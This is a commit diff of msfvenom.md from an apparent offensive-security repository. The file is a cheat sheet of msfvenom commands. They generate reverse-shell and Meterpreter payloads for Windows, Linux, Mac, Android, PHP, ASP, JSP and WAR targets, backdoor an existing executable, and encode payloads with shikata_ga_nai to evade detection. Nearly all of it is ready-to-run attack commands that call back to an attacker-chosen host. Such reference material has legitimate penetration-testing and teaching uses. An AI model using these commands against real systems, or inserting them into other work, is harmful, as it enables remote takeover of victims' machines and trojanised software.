mirror of
https://github.com/The-Art-of-Hacking/h4cker
synced 2024-11-21 18:33:03 +00:00
Update msfvenom.md
This commit is contained in:
parent
c626bd13b7
commit
8fddec29a1
1 changed files with 70 additions and 28 deletions
|
@ -2,39 +2,81 @@
|
|||
|
||||
MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and msfencode.
|
||||
|
||||
## Creting Binaries
|
||||
- `msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe`
|
||||
- Creates a simple TCP Payload for Windows
|
||||
- `msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe`
|
||||
- Creates a simple HTTP Payload for Windows
|
||||
- `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf`
|
||||
- Creates a simple TCP Shell for Linux
|
||||
- `msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho`
|
||||
- Creates a simple TCP Shell for Mac
|
||||
- `msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk`
|
||||
- Creates a simple TCP Payload for Android
|
||||
## Creating Binaries
|
||||
The following create different binaries for meterpreter and reverse TCP shells:
|
||||
|
||||
### Creates a Reverse TCP Meterpreter Shell - Payload for Windows
|
||||
|
||||
```
|
||||
msfvenom -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f exe > payload.exe
|
||||
```
|
||||
|
||||
### Creates a simple HTTP Payload for Windows
|
||||
```
|
||||
msfvenom -p windows/meterpreter/reverse_http LHOST={HOST/IP} LPORT={PORT} -f exe > payload.exe
|
||||
```
|
||||
|
||||
### Creates a simple TCP Shell for Linux
|
||||
```
|
||||
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f elf > payload.elf
|
||||
```
|
||||
|
||||
### Creates a simple TCP Shell for Mac
|
||||
|
||||
```
|
||||
msfvenom -p osx/x86/shell_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f macho > example.macho
|
||||
```
|
||||
|
||||
### Creates a simple TCP Payload for Android
|
||||
|
||||
```
|
||||
msfvenom -p android/meterpreter/reverse/tcp LHOST={HOST/IP} LPORT={PORT} R > example.apk`
|
||||
```
|
||||
|
||||
## Web Payloads
|
||||
Command Info
|
||||
- `msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php`
|
||||
- Creates a Simple TCP Shell for PHP
|
||||
- `msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp`
|
||||
- Creates a Simple TCP Shell for ASP
|
||||
- `msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp`
|
||||
- Creates a Simple TCP Shell for Javascript
|
||||
- `msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war`
|
||||
- Creates a Simple TCP Shell for WAR
|
||||
|
||||
### Creates a Simple TCP Shell for PHP
|
||||
```
|
||||
msfvenom -p php/meterpreter_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f raw > example.php
|
||||
```
|
||||
|
||||
### Creates a Simple TCP Shell for ASP
|
||||
```
|
||||
msfvenom -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f asp > example.asp
|
||||
```
|
||||
|
||||
### Creates a Simple TCP Shell for Javascrip
|
||||
```
|
||||
msfvenom -p java/jsp_shell_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f raw > example.jsp
|
||||
```
|
||||
|
||||
### Creates a Simple TCP Shell for WAR
|
||||
|
||||
```
|
||||
msfvenom -p java/jsp_shell_reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f war > example.war
|
||||
```
|
||||
|
||||
## Windows Payloads
|
||||
|
||||
- `msfvenom -l encoders`
|
||||
- Lists all avalaible encoders
|
||||
- `msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe`
|
||||
- Binds an exe with a Payload (Backdoors an exe)
|
||||
- `msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f exe > example.exe`
|
||||
- Creates a simple TCP payload with shikata_ga_nai encoder
|
||||
- `msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe`
|
||||
- Binds an exe with a Payload and encodes it
|
||||
### Lists all avalaible encoder
|
||||
```
|
||||
msfvenom -l encoders
|
||||
```
|
||||
|
||||
### Binds an exe with a Payload (Backdoors an exe)
|
||||
```
|
||||
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -f exe > example.exe
|
||||
```
|
||||
|
||||
### Creates a simple TCP payload with shikata_ga_nai encoder
|
||||
```
|
||||
msfvenom -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f exe > example.exe
|
||||
```
|
||||
|
||||
### Binds an exe with a Payload and encodes it
|
||||
```
|
||||
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={HOST/IP} LPORT={PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe
|
||||
```
|
||||
|
||||
## Getting a Metepreter Shell
|
||||
```
|
||||
|
|
Loading…
Reference in a new issue